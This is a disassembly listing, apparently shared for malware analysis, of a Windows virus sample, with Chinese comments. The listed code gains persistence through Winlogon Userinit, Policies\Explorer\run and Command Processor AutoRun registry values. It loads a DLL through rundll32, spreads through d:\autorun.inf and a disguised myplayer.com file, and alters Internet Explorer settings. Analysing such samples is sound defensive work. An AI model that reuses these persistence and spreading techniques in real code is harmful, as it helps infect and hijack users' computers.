00408999 BA 58914000 mov edx, 00409158 ; ASCII "start"
0040899E A1 B0B64000 mov eax, dword ptr [40B6B0]
004089A3 E8 DCE9FFFF call 00407384
004089A8 A1 B0B64000 mov eax, dword ptr [40B6B0]
004089AD 50 push eax
004089AE E8 51D6FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
004089B3 85C0 test eax, eax
004089B5 0F84 9A000000 je 00408A55
004089BB 8D85 64FFFFFF lea eax, dword ptr [ebp-9C]
004089C1 E8 B6C3FFFF call 00404D7C
004089C6 A1 C0B64000 mov eax, dword ptr [40B6C0]
004089CB E8 90C4FFFF call 00404E60
004089D0 8BD8 mov ebx, eax
004089D2 A1 C4B64000 mov eax, dword ptr [40B6C4]
004089D7 E8 84C4FFFF call 00404E60
004089DC 3BD8 cmp ebx, eax
004089DE 7C 54 jl short 00408A34
004089E0 68 68914000 push 00409168 ; ASCII "userinit.exe"
004089E5 B9 80914000 mov ecx, 00409180 ; ASCII "Userinit"
004089EA BA 94914000 mov edx, 00409194 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
004089EF B8 02000080 mov eax, 80000002
004089F4 E8 17DDFFFF call 00406710
004089F9 68 D4914000 push 004091D4 ; ASCII "rundll32.exe "
004089FE FF35 B0B64000 push dword ptr [40B6B0]
00408A04 68 EC914000 push 004091EC ; ASCII " start"
00408A09 8D85 60FFFFFF lea eax, dword ptr [ebp-A0]
00408A0F BA 03000000 mov edx, 3
00408A14 E8 7FAEFFFF call 00403898
00408A19 8B85 60FFFFFF mov eax, dword ptr [ebp-A0]
00408A1F 50 push eax
00408A20 B9 80914000 mov ecx, 00409180 ; ASCII "Userinit"
00408A25 BA FC914000 mov edx, 004091FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run"
00408A2A B8 02000080 mov eax, 80000002
00408A2F E8 DCDCFFFF call 00406710
00408A34 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A39 50 push eax
00408A3A 8D85 5CFFFFFF lea eax, dword ptr [ebp-A4]
00408A40 50 push eax
00408A41 B9 C88F4000 mov ecx, 00408FC8
00408A46 BA 44924000 mov edx, 00409244 ; ASCII "kv"
00408A4B A1 E4B64000 mov eax, dword ptr [40B6E4]
00408A50 E8 6FD6FFFF call 004060C4
00408A55 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A5A 50 push eax
00408A5B 8D85 58FFFFFF lea eax, dword ptr [ebp-A8]
00408A61 50 push eax
00408A62 33C9 xor ecx, ecx
00408A64 BA A8904000 mov edx, 004090A8 ; ASCII "dll"
00408A69 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408A6E E8 99D5FFFF call 0040600C
00408A73 8B95 58FFFFFF mov edx, dword ptr [ebp-A8]
00408A79 B8 B0B64000 mov eax, 0040B6B0
00408A7E E8 31ACFFFF call 004036B4
00408A83 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408A88 E8 A3E7FFFF call 00407230
00408A8D A1 A0B64000 mov eax, dword ptr [40B6A0]
00408A92 50 push eax
00408A93 8D85 54FFFFFF lea eax, dword ptr [ebp-AC]
00408A99 50 push eax
00408A9A 33C9 xor ecx, ecx
00408A9C BA C0904000 mov edx, 004090C0 ; ASCII "exe"
00408AA1 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408AA6 E8 61D5FFFF call 0040600C
00408AAB 8B95 54FFFFFF mov edx, dword ptr [ebp-AC]
00408AB1 B8 B0B64000 mov eax, 0040B6B0
00408AB6 E8 F9ABFFFF call 004036B4
00408ABB A1 B0B64000 mov eax, dword ptr [40B6B0]
00408AC0 E8 6BE7FFFF call 00407230
00408AC5 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408ACA 50 push eax
00408ACB 8D85 50FFFFFF lea eax, dword ptr [ebp-B0]
00408AD1 50 push eax
00408AD2 33C9 xor ecx, ecx
00408AD4 BA E0904000 mov edx, 004090E0 ; ASCII "dll32"
00408AD9 B8 B4904000 mov eax, 004090B4 ; ASCII "old"
00408ADE E8 29D5FFFF call 0040600C
00408AE3 8B95 50FFFFFF mov edx, dword ptr [ebp-B0]
00408AE9 B8 B0B64000 mov eax, 0040B6B0
00408AEE E8 C1ABFFFF call 004036B4
00408AF3 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408AF8 E8 33E7FFFF call 00407230
00408AFD A1 00B74000 mov eax, dword ptr [40B700]
00408B02 50 push eax
00408B03 E8 FCD4FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408B08 85C0 test eax, eax
00408B0A 0F84 10010000 je 00408C20
00408B10 8D95 4CFFFFFF lea edx, dword ptr [ebp-B4]
00408B16 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408B1B E8 C8D8FFFF call 004063E8
00408B20 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00408B26 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408B2C E8 F3ADFFFF call 00403924
00408B31 0F84 E9000000 je 00408C20
00408B37 A1 C0B64000 mov eax, dword ptr [40B6C0]
00408B3C E8 1FC3FFFF call 00404E60
00408B41 8BD8 mov ebx, eax
00408B43 A1 C4B64000 mov eax, dword ptr [40B6C4]
00408B48 E8 13C3FFFF call 00404E60
00408B4D 3BD8 cmp ebx, eax
00408B4F 0F8C CB000000 jl 00408C20
00408B55 68 50924000 push 00409250 ; ASCII "no"
00408B5A B9 5C924000 mov ecx, 0040925C ; ASCII "Check_Associations"
00408B5F BA 78924000 mov edx, 00409278 ; ASCII "Software\Microsoft\Internet Explorer\Main"
00408B64 B8 01000080 mov eax, 80000001
00408B69 E8 A2DBFFFF call 00406710
00408B6E 6A 00 push 0
00408B70 B9 AC924000 mov ecx, 004092AC ; ASCII "EnableAutodial"
00408B75 BA C4924000 mov edx, 004092C4 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Internet Settings"
00408B7A B8 01000080 mov eax, 80000001
00408B7F E8 78F2FFFF call 00407DFC
00408B84 6A 00 push 0
00408B86 B9 08934000 mov ecx, 00409308 ; ASCII "NoNetAutodial"
00408B8B BA C4924000 mov edx, 004092C4 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Internet Settings"
00408B90 B8 01000080 mov eax, 80000001
00408B95 E8 62F2FFFF call 00407DFC
00408B9A A1 00B74000 mov eax, dword ptr [40B700]
00408B9F E8 8CE6FFFF call 00407230
00408BA4 68 E8030000 push 3E8
00408BA9 E8 72B7FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408BAE A1 00B74000 mov eax, dword ptr [40B700]
00408BB3 50 push eax
00408BB4 E8 4BD4FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408BB9 83F8 01 cmp eax, 1
00408BBC 1BC0 sbb eax, eax
00408BBE 40 inc eax
00408BBF 84C0 test al, al
00408BC1 75 5D jnz short 00408C20
00408BC3 B8 FCB64000 mov eax, 0040B6FC
00408BC8 8B0D E4B64000 mov ecx, dword ptr [40B6E4]
00408BCE BA 38914000 mov edx, 00409138 ; ASCII "dll_"
00408BD3 E8 4CACFFFF call 00403824
00408BD8 A1 FCB64000 mov eax, dword ptr [40B6FC]
00408BDD 50 push eax
00408BDE 68 88904000 push 00409088 ; ASCII "fn"
00408BE3 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408BE8 50 push eax
00408BE9 B9 A8904000 mov ecx, 004090A8 ; ASCII "dll"
00408BEE BA 48914000 mov edx, 00409148 ; ASCII "maindll"
00408BF3 A1 00B74000 mov eax, dword ptr [40B700]
00408BF8 E8 87E7FFFF call 00407384
00408BFD 68 E8030000 push 3E8
00408C02 E8 19B7FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408C07 A1 00B74000 mov eax, dword ptr [40B700]
00408C0C 50 push eax
00408C0D E8 F2D3FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408C12 85C0 test eax, eax
00408C14 74 0A je short 00408C20
00408C16 A1 00B74000 mov eax, dword ptr [40B700]
00408C1B E8 A4ECFFFF call 004078C4
00408C20 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408C25 50 push eax
00408C26 E8 D9D3FFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
00408C2B 85C0 test eax, eax
00408C2D 74 1A je short 00408C49
00408C2F A1 C8B64000 mov eax, dword ptr [40B6C8]
00408C34 50 push eax
00408C35 B9 20934000 mov ecx, 00409320 ; ASCII "AutoRun"
00408C3A BA 30934000 mov edx, 00409330 ; ASCII "SOFTWARE\Microsoft\Command Processor"
00408C3F B8 02000080 mov eax, 80000002
00408C44 E8 C7DAFFFF call 00406710
00408C49 33C0 xor eax, eax
00408C4B 5A pop edx
00408C4C 59 pop ecx
00408C4D 59 pop ecx
00408C4E 64:8910 mov dword ptr fs:[eax], edx
00408C51 EB 0A jmp short 00408C5D
00408C53 ^ E9 78A3FFFF jmp 00402FD0
00408C58 E8 2BA5FFFF call 00403188
00408C5D 33C0 xor eax, eax
00408C5F 5A pop edx
00408C60 59 pop ecx
00408C61 59 pop ecx
00408C62 64:8910 mov dword ptr fs:[eax], edx
00408C65 68 058E4000 push 00408E05
00408C6A 803D F8B64000 0>cmp byte ptr [40B6F8], 0
00408C71 0F84 AB000000 je 00408D22
00408C77 33C0 xor eax, eax
00408C79 55 push ebp
00408C7A 68 188D4000 push 00408D18
00408C7F 64:FF30 push dword ptr fs:[eax]
00408C82 64:8920 mov dword ptr fs:[eax], esp
00408C85 E8 7AE0FFFF call 00406D04
00408C8A 83C4 F8 add esp, -8
00408C8D DD1C24 fstp qword ptr [esp]
00408C90 9B wait
00408C91 68 EEB64000 push 0040B6EE
00408C96 68 F0B64000 push 0040B6F0
00408C9B 68 F2B64000 push 0040B6F2
00408CA0 68 F4B64000 push 0040B6F4
00408CA5 B9 ECB64000 mov ecx, 0040B6EC
00408CAA BA EAB64000 mov edx, 0040B6EA
00408CAF B8 E8B64000 mov eax, 0040B6E8
00408CB4 E8 6BDEFFFF call 00406B24
00408CB9 66:A1 F6B64000 mov ax, word ptr [40B6F6]
00408CBF 66:A3 E8B64000 mov word ptr [40B6E8], ax
00408CC5 66:813D E8B6400>cmp word ptr [40B6E8], 7D7
00408CCE 73 09 jnb short 00408CD9
00408CD0 66:C705 E8B6400>mov word ptr [40B6E8], 7D7
00408CD9 66:A1 EEB64000 mov ax, word ptr [40B6EE]
00408CDF 50 push eax
00408CE0 66:A1 F0B64000 mov ax, word ptr [40B6F0]
00408CE6 50 push eax
00408CE7 66:A1 F2B64000 mov ax, word ptr [40B6F2]
00408CED 50 push eax
00408CEE 66:A1 F4B64000 mov ax, word ptr [40B6F4]
00408CF4 50 push eax
00408CF5 66:8B0D ECB6400>mov cx, word ptr [40B6EC]
00408CFC 66:8B15 EAB6400>mov dx, word ptr [40B6EA]
00408D03 66:A1 E8B64000 mov ax, word ptr [40B6E8]
00408D09 E8 6AE7FFFF call 00407478
00408D0E 33C0 xor eax, eax
00408D10 5A pop edx
00408D11 59 pop ecx
00408D12 59 pop ecx
00408D13 64:8910 mov dword ptr fs:[eax], edx
00408D16 EB 0A jmp short 00408D22
00408D18 ^ E9 B3A2FFFF jmp 00402FD0
00408D1D E8 66A4FFFF call 00403188
00408D22 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408D27 50 push eax
00408D28 8D85 48FFFFFF lea eax, dword ptr [ebp-B8]
00408D2E 50 push eax
00408D2F B9 60934000 mov ecx, 00409360 ; ASCII "c:\myDelm.bat"
00408D34 BA 78934000 mov edx, 00409378 ; ASCII "bat"
00408D39 B8 84934000 mov eax, 00409384 ; ASCII "sys"
00408D3E E8 81D3FFFF call 004060C4
00408D43 803D 9CB64000 0>cmp byte ptr [40B69C], 0
00408D4A 75 0A jnz short 00408D56
00408D4C 68 983A0000 push 3A98
00408D51 E8 CAB5FFFF call 00404320 ; jmp 到 kernel32.Sleep
00408D56 833D 08B74000 0>cmp dword ptr [40B708], 0
00408D5D 74 11 je short 00408D70
00408D5F 6A 00 push 0
00408D61 A1 08B74000 mov eax, dword ptr [40B708]
00408D66 50 push eax
00408D67 E8 CCB5FFFF call 00404338 ; jmp 到 kernel32.WaitForSingleObject
00408D6C 85C0 test eax, eax
00408D6E ^ 75 EF jnz short 00408D5F
00408D70 8D95 44FFFFFF lea edx, dword ptr [ebp-BC]
00408D76 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408D7B E8 68D6FFFF call 004063E8
00408D80 8B85 44FFFFFF mov eax, dword ptr [ebp-BC]
00408D86 50 push eax
00408D87 8D95 40FFFFFF lea edx, dword ptr [ebp-C0]
00408D8D A1 B4B64000 mov eax, dword ptr [40B6B4]
00408D92 E8 51D6FFFF call 004063E8
00408D97 8B85 40FFFFFF mov eax, dword ptr [ebp-C0]
00408D9D 5A pop edx
00408D9E E8 15ADFFFF call 00403AB8
00408DA3 85C0 test eax, eax
00408DA5 7F 53 jg short 00408DFA
00408DA7 8D95 3CFFFFFF lea edx, dword ptr [ebp-C4]
00408DAD A1 C8B64000 mov eax, dword ptr [40B6C8]
00408DB2 E8 31D6FFFF call 004063E8
00408DB7 8B85 3CFFFFFF mov eax, dword ptr [ebp-C4]
00408DBD 50 push eax
00408DBE 8D95 38FFFFFF lea edx, dword ptr [ebp-C8]
00408DC4 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408DC9 E8 1AD6FFFF call 004063E8
00408DCE 8B95 38FFFFFF mov edx, dword ptr [ebp-C8]
00408DD4 58 pop eax
00408DD5 E8 4AABFFFF call 00403924
00408DDA 74 1E je short 00408DFA
00408DDC 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408DE2 B8 90934000 mov eax, 00409390 ; ASCII "system32"
00408DE7 E8 CCACFFFF call 00403AB8
00408DEC 85C0 test eax, eax
00408DEE 7F 0A jg short 00408DFA
00408DF0 A1 B8B64000 mov eax, dword ptr [40B6B8]
00408DF5 E8 7ED3FFFF call 00406178
00408DFA C3 retn
00408DFB ^ E9 FCA2FFFF jmp 004030FC
00408E00 ^ E9 65FEFFFF jmp 00408C6A
00408E05 8D85 34FFFFFF lea eax, dword ptr [ebp-CC]
00408E0B E8 6CBFFFFF call 00404D7C
00408E10 33C0 xor eax, eax
00408E12 5A pop edx
00408E13 59 pop ecx
00408E14 59 pop ecx
00408E15 64:8910 mov dword ptr fs:[eax], edx
00408E18 68 358E4000 push 00408E35
00408E1D 8D85 34FFFFFF lea eax, dword ptr [ebp-CC]
00408E23 BA 2F000000 mov edx, 2F
00408E28 E8 57A8FFFF call 00403684
00408E2D C3 retn
下面附件是病毒样本
00408004 6A 00 push 0
00408006 6A 00 push 0
00408008 49 dec ecx
00408009 ^ 75 F9 jnz short 00408004
0040800B 51 push ecx
0040800C 53 push ebx
0040800D 56 push esi
0040800E 57 push edi
0040800F B8 C47F4000 mov eax, 00407FC4
00408014 E8 43C1FFFF call 0040415C
00408019 33C0 xor eax, eax
0040801B 55 push ebp
0040801C 68 2E8E4000 push 00408E2E
00408021 64:FF30 push dword ptr fs:[eax]
00408024 64:8920 mov dword ptr fs:[eax], esp
00408027 C605 9CB64000 0>mov byte ptr [40B69C], 0
0040802E 33C0 xor eax, eax
00408030 A3 08B74000 mov dword ptr [40B708], eax
00408035 33D2 xor edx, edx
00408037 55 push ebp
00408038 68 FB8D4000 push 00408DFB
0040803D 64:FF32 push dword ptr fs:[edx]
00408040 64:8922 mov dword ptr fs:[edx], esp
00408043 33D2 xor edx, edx
00408045 55 push ebp
00408046 68 538C4000 push 00408C53
0040804B 64:FF32 push dword ptr fs:[edx]
0040804E 64:8922 mov dword ptr fs:[edx], esp
00408051 E8 96A6FFFF call 004026EC
00408056 85C0 test eax, eax
00408058 7E 1A jle short 00408074
0040805A 8D55 EC lea edx, dword ptr [ebp-14]
0040805D B8 01000000 mov eax, 1
00408062 E8 E5A6FFFF call 0040274C
00408067 8B45 EC mov eax, dword ptr [ebp-14]
0040806A BA 488E4000 mov edx, 00408E48 ; ASCII "-sj"
0040806F E8 B0B8FFFF call 00403924
00408074 8D55 E8 lea edx, dword ptr [ebp-18]
00408077 B8 548E4000 mov eax, 00408E54 ; ASCII "070514 "
0040807C E8 EBCDFFFF call 00404E6C
00408081 8B55 E8 mov edx, dword ptr [ebp-18]
00408084 B8 C0B64000 mov eax, 0040B6C0
00408089 E8 26B6FFFF call 004036B4
0040808E 8D55 E4 lea edx, dword ptr [ebp-1C]
00408091 B8 708E4000 mov eax, 00408E70 ; ASCII "934236 "
00408096 E8 D1CDFFFF call 00404E6C
0040809B 8B55 E4 mov edx, dword ptr [ebp-1C]
0040809E B8 04B74000 mov eax, 0040B704
004080A3 E8 0CB6FFFF call 004036B4
004080A8 68 A0B64000 push 0040B6A0
004080AD B9 01000000 mov ecx, 1
004080B2 BA 01000000 mov edx, 1
004080B7 B8 988E4000 mov eax, 00408E98
004080BC E8 6FB9FFFF call 00403A30
004080C1 8D45 E0 lea eax, dword ptr [ebp-20]
004080C4 50 push eax
004080C5 B9 01000000 mov ecx, 1
004080CA BA 01000000 mov edx, 1
004080CF B8 A48E4000 mov eax, 00408EA4
004080D4 E8 57B9FFFF call 00403A30
004080D9 8B55 E0 mov edx, dword ptr [ebp-20]
004080DC B8 A0B64000 mov eax, 0040B6A0
004080E1 E8 FAB6FFFF call 004037E0
004080E6 B8 A0B64000 mov eax, 0040B6A0
004080EB BA B08E4000 mov edx, 00408EB0
004080F0 E8 EBB6FFFF call 004037E0
004080F5 B8 A0B64000 mov eax, 0040B6A0
004080FA BA BC8E4000 mov edx, 00408EBC ; ASCII "in"
004080FF E8 DCB6FFFF call 004037E0
00408104 B8 A0B64000 mov eax, 0040B6A0
00408109 BA C88E4000 mov edx, 00408EC8 ; ASCII "sy"
0040810E E8 CDB6FFFF call 004037E0
00408113 B8 A0B64000 mov eax, 0040B6A0
00408118 BA D48E4000 mov edx, 00408ED4 ; ASCII "s.i"
0040811D E8 BEB6FFFF call 004037E0
00408122 B8 A0B64000 mov eax, 0040B6A0
00408127 BA E08E4000 mov edx, 00408EE0 ; ASCII "ni"
0040812C E8 AFB6FFFF call 004037E0
00408131 8D45 DC lea eax, dword ptr [ebp-24]
00408134 E8 93CBFFFF call 00404CCC
00408139 8B55 DC mov edx, dword ptr [ebp-24]
0040813C B8 B4B64000 mov eax, 0040B6B4
00408141 E8 6EB5FFFF call 004036B4
00408146 8D55 D4 lea edx, dword ptr [ebp-2C]
00408149 33C0 xor eax, eax
0040814B E8 FCA5FFFF call 0040274C
00408150 8B45 D4 mov eax, dword ptr [ebp-2C]
00408153 8D55 D8 lea edx, dword ptr [ebp-28]
00408156 E8 8DE2FFFF call 004063E8
0040815B 8B55 D8 mov edx, dword ptr [ebp-28]
0040815E B8 B8B64000 mov eax, 0040B6B8
00408163 E8 4CB5FFFF call 004036B4
00408168 B8 D0B64000 mov eax, 0040B6D0
0040816D BA EC8E4000 mov edx, 00408EEC ; ASCII "Alx"
00408172 E8 3DB5FFFF call 004036B4
00408177 B8 D0B64000 mov eax, 0040B6D0
0040817C BA F88E4000 mov edx, 00408EF8
00408181 E8 5AB6FFFF call 004037E0
00408186 B8 D0B64000 mov eax, 0040B6D0
0040818B BA 048F4000 mov edx, 00408F04 ; ASCII "es"
00408190 E8 4BB6FFFF call 004037E0
00408195 B8 D4B64000 mov eax, 0040B6D4
0040819A BA 108F4000 mov edx, 00408F10 ; ASCII "win"
0040819F E8 10B5FFFF call 004036B4
004081A4 B8 D4B64000 mov eax, 0040B6D4
004081A9 BA C88E4000 mov edx, 00408EC8 ; ASCII "sy"
004081AE E8 2DB6FFFF call 004037E0
004081B3 B8 D4B64000 mov eax, 0040B6D4
004081B8 BA 1C8F4000 mov edx, 00408F1C ; ASCII "s16_"
004081BD E8 1EB6FFFF call 004037E0
004081C2 B8 D8B64000 mov eax, 0040B6D8
004081C7 BA 2C8F4000 mov edx, 00408F2C ; ASCII "wins"
004081CC E8 E3B4FFFF call 004036B4
004081D1 B8 D8B64000 mov eax, 0040B6D8
004081D6 BA 3C8F4000 mov edx, 00408F3C ; ASCII "ys32_"
004081DB E8 00B6FFFF call 004037E0
004081E0 B8 DCB64000 mov eax, 0040B6DC
004081E5 BA 4C8F4000 mov edx, 00408F4C ; ASCII "scrsys"
004081EA E8 C5B4FFFF call 004036B4
004081EF B8 E0B64000 mov eax, 0040B6E0
004081F4 BA 5C8F4000 mov edx, 00408F5C ; ASCII "scrs"
004081F9 E8 B6B4FFFF call 004036B4
004081FE B8 E0B64000 mov eax, 0040B6E0
00408203 BA 6C8F4000 mov edx, 00408F6C ; ASCII "ys16_"
00408208 E8 D3B5FFFF call 004037E0
0040820D 8D55 D0 lea edx, dword ptr [ebp-30]
00408210 B8 7C8F4000 mov eax, 00408F7C ; ASCII "d:\myplayer.com"
00408215 E8 CEE1FFFF call 004063E8
0040821A 8B55 D0 mov edx, dword ptr [ebp-30]
0040821D B8 C8B64000 mov eax, 0040B6C8
00408222 E8 8DB4FFFF call 004036B4
00408227 B8 E4B64000 mov eax, 0040B6E4
0040822C BA 948F4000 mov edx, 00408F94 ; ASCII "hi"
00408231 E8 7EB4FFFF call 004036B4
00408236 B8 E4B64000 mov eax, 0040B6E4
0040823B BA A08F4000 mov edx, 00408FA0 ; ASCII "tpop"
00408240 E8 9BB5FFFF call 004037E0
00408245 B8 CCB64000 mov eax, 0040B6CC
0040824A BA B08F4000 mov edx, 00408FB0 ; ASCII "d:\autorun.inf"
0040824F E8 60B4FFFF call 004036B4
00408254 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408259 50 push eax
0040825A 8D45 CC lea eax, dword ptr [ebp-34]
0040825D 50 push eax
0040825E B9 C88F4000 mov ecx, 00408FC8
00408263 BA D48F4000 mov edx, 00408FD4 ; ASCII "ver"
00408268 A1 E4B64000 mov eax, dword ptr [40B6E4]
0040826D E8 9ADDFFFF call 0040600C
00408272 8B55 CC mov edx, dword ptr [ebp-34]
00408275 B8 C4B64000 mov eax, 0040B6C4
0040827A E8 35B4FFFF call 004036B4
0040827F 8D55 C8 lea edx, dword ptr [ebp-38]
00408282 A1 C8B64000 mov eax, dword ptr [40B6C8]
00408287 E8 5CE1FFFF call 004063E8
0040828C 8B45 C8 mov eax, dword ptr [ebp-38]
0040828F 8B15 B8B64000 mov edx, dword ptr [40B6B8]
00408295 E8 8AB6FFFF call 00403924
0040829A 0F85 9C000000 jnz 0040833C
004082A0 A1 C0B64000 mov eax, dword ptr [40B6C0]
004082A5 E8 B6CBFFFF call 00404E60
004082AA 8BD8 mov ebx, eax
004082AC A1 C4B64000 mov eax, dword ptr [40B6C4]
004082B1 E8 AACBFFFF call 00404E60
004082B6 3BD8 cmp ebx, eax
004082B8 7D 0C jge short 004082C6
004082BA C605 9CB64000 0>mov byte ptr [40B69C], 1
004082C1 E9 83090000 jmp 00408C49
004082C6 FF35 B4B64000 push dword ptr [40B6B4]
004082CC FF35 D0B64000 push dword ptr [40B6D0]
004082D2 FF35 C0B64000 push dword ptr [40B6C0]
004082D8 68 E08F4000 push 00408FE0 ; ASCII ".exe"
004082DD B8 B0B64000 mov eax, 0040B6B0
004082E2 BA 04000000 mov edx, 4
004082E7 E8 ACB5FFFF call 00403898
004082EC A1 B0B64000 mov eax, dword ptr [40B6B0]
004082F1 50 push eax
004082F2 E8 0DDDFFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
004082F7 85C0 test eax, eax
004082F9 74 41 je short 0040833C
004082FB FF35 B4B64000 push dword ptr [40B6B4] ; C:\WINDOWS\system32\
00408301 FF35 D4B64000 push dword ptr [40B6D4] ; winsys16_
00408307 FF35 C0B64000 push dword ptr [40B6C0] ; 070514
0040830D 68 F08F4000 push 00408FF0 ; ASCII ".dll"
00408312 B8 B0B64000 mov eax, 0040B6B0
****************************************************************************************
0040B6A0 00970054 ASCII "mywinsys.ini"
0040B6A4 00000000
0040B6A8 00000000
0040B6AC 00000000
0040B6B0 009701EC ASCII "C:\WINDOWS\system32\winsys16_070514.dll"
0040B6B4 00970070 ASCII "C:\WINDOWS\system32\"
0040B6B8 009700B0 ASCII "d:\myplayer.com"
0040B6BC 00000000
0040B6C0 0097000C ASCII "070514"
0040B6C4 00970188 ASCII "070514"
0040B6C8 0097013C ASCII "d:\myplayer.com"
0040B6CC 0097016C ASCII "d:\autorun.inf"
0040B6D0 009700CC ASCII "AlxRes"
0040B6D4 009700E0 ASCII "winsys16_"
0040B6D8 009700F8 ASCII "winsys32_"
0040B6DC 00970110 ASCII "scrsys"
0040B6E0 00970124 ASCII "scrsys16_"
0040B6E4 00970158 ASCII "hitpop"
****************************************************************************************
00408317 BA 04000000 mov edx, 4
0040831C E8 77B5FFFF call 00403898
00408321 A1 B0B64000 mov eax, dword ptr [40B6B0]
00408326 50 push eax
00408327 E8 D8DCFFFF call 00406004 ; jmp 到 SHLWAPI.PathFileExistsA
0040832C 85C0 test eax, eax
0040832E 74 0C je short 0040833C
00408330 C605 9CB64000 0>mov byte ptr [40B69C], 1
00408337 E9 0D090000 jmp 00408C49
0040833C A1 A0B64000 mov eax, dword ptr [40B6A0]
00408341 50 push eax
00408342 8D45 C4 lea eax, dword ptr [ebp-3C]
00408345 50 push eax
00408346 B9 C88F4000 mov ecx, 00408FC8
0040834B BA 00904000 mov edx, 00409000 ; ASCII "first"
00408350 A1 E4B64000 mov eax, dword ptr [40B6E4]
00408355 E8 B2DCFFFF call 0040600C
0040835A 8B45 C4 mov eax, dword ptr [ebp-3C]
0040835D BA C88F4000 mov edx, 00408FC8
00408362 E8 BDB5FFFF call 00403924
00408367 0F85 9C000000 jnz 00408409
0040836D B0 01 mov al, 1
0040836F E8 4CCAFFFF call 00404DC0
00408374 B8 FCB64000 mov eax, 0040B6FC
00408379 BA 10904000 mov edx, 00409010 ; ASCII "te"
0040837E E8 31B3FFFF call 004036B4
00408383 B8 FCB64000 mov eax, 0040B6FC
00408388 BA 1C904000 mov edx, 0040901C ; ASCII "st"
0040838D E8 4EB4FFFF call 004037E0
00408392 E8 BDE9FFFF call 00406D54
00408397 84C0 test al, al
00408399 74 4F je short 004083EA
0040839B A1 A0B64000 mov eax, dword ptr [40B6A0]
004083A0 50 push eax
004083A1 8D45 C0 lea eax, dword ptr [ebp-40]
004083A4 50 push eax
004083A5 B9 C88F4000 mov ecx, 00408FC8
004083AA 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083B0 A1 E4B64000 mov eax, dword ptr [40B6E4]
004083B5 E8 52DCFFFF call 0040600C
004083BA 8B45 C0 mov eax, dword ptr [ebp-40]
004083BD BA 28904000 mov edx, 00409028
004083C2 E8 5DB5FFFF call 00403924
004083C7 74 40 je short 00408409
004083C9 A1 A0B64000 mov eax, dword ptr [40B6A0]
004083CE 50 push eax
004083CF 8D45 BC lea eax, dword ptr [ebp-44]
004083D2 50 push eax
004083D3 B9 C88F4000 mov ecx, 00408FC8
004083D8 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083DE A1 E4B64000 mov eax, dword ptr [40B6E4]
004083E3 E8 DCDCFFFF call 004060C4
004083E8 EB 1F jmp short 00408409
004083EA A1 A0B64000 mov eax, dword ptr [40B6A0]
004083EF 50 push eax
004083F0 8D45 B8 lea eax, dword ptr [ebp-48]
004083F3 50 push eax
004083F4 B9 28904000 mov ecx, 00409028
004083F9 8B15 FCB64000 mov edx, dword ptr [40B6FC]
004083FF A1 E4B64000 mov eax, dword ptr [40B6E4]
00408404 E8 BBDCFFFF call 004060C4
00408409 A1 A0B64000 mov eax, dword ptr [40B6A0]
0040840E 50 push eax
0040840F 8D45 B4 lea eax, dword ptr [ebp-4C]
00408412 50 push eax
00408413 B9 28904000 mov ecx, 00409028
00408418 BA 00904000 mov edx, 00409000 ; ASCII "first"
0040841D A1 E4B64000 mov eax, dword ptr [40B6E4]
00408422 E8 9DDCFFFF call 004060C4
00408427 8D55 B0 lea edx, dword ptr [ebp-50]
0040842A 33C0 xor eax, eax
0040842C E8 1BA3FFFF call 0040274C
00408431 8B55 B0 mov edx, dword ptr [ebp-50]
00408434 B8 34904000 mov eax, 00409034
00408439 E8 7AB6FFFF call 00403AB8
0040843E 85C0 test eax, eax
00408440 7E 1E jle short 00408460
00408442 A1 A0B64000 mov eax, dword ptr [40B6A0]
00408447 50 push eax
00408448 8D45 AC lea eax, dword ptr [ebp-54]
0040844B 50 push eax
0040844C B9 28904000 mov ecx, 00409028
00408451 BA 44904000 mov edx, 00409044 ; ASCII "test"
00408456 A1 E4B64000 mov eax, dword ptr [40B6E4]
0040845B E8 64DCFFFF call 004060C4
00408460 B0 01 mov al, 1
00408462 E8 59C9FFFF call 00404DC0
00408467 E8 5CEBFFFF call 00406FC8
0040846C A2 F8B64000 mov byte ptr [40B6F8], al
00408471 B0 01 mov al, 1
00408473 E8 48C9FFFF call 00404DC0
00408478 E8 BBDFFFFF call 00406438
0040847D 68 BCB64000 push 0040B6BC
00408482 6A 00 push 0
00408484 6A 00 push 0
00408486 68 D4514000 push 004051D4
0040848B 6A 00 push 0
0040848D 6A 00 push 0
0040848F E8 E4BDFFFF call 00404278 ; jmp 到 kernel32.CreateThread
00408494 A3 08B74000 mov dword ptr [40B708], eax
00408499 803D F8B64000 0>cmp byte ptr [40B6F8], 0
004084A0 0F84 AA000000 je 00408550
004084A6 33C0 xor eax, eax
004084A8 55 push ebp
004084A9 68 46854000 push 00408546
004084AE 64:FF30 push dword ptr fs:[eax]
004084B1 64:8920 mov dword ptr fs:[eax], esp
004084B4 E8 4BE8FFFF call 00406D04
004084B9 83C4 F8 add esp, -8
004084BC DD1C24 fstp qword ptr [esp]
004084BF 9B wait
004084C0 68 EEB64000 push 0040B6EE
004084C5 68 F0B64000 push 0040B6F0
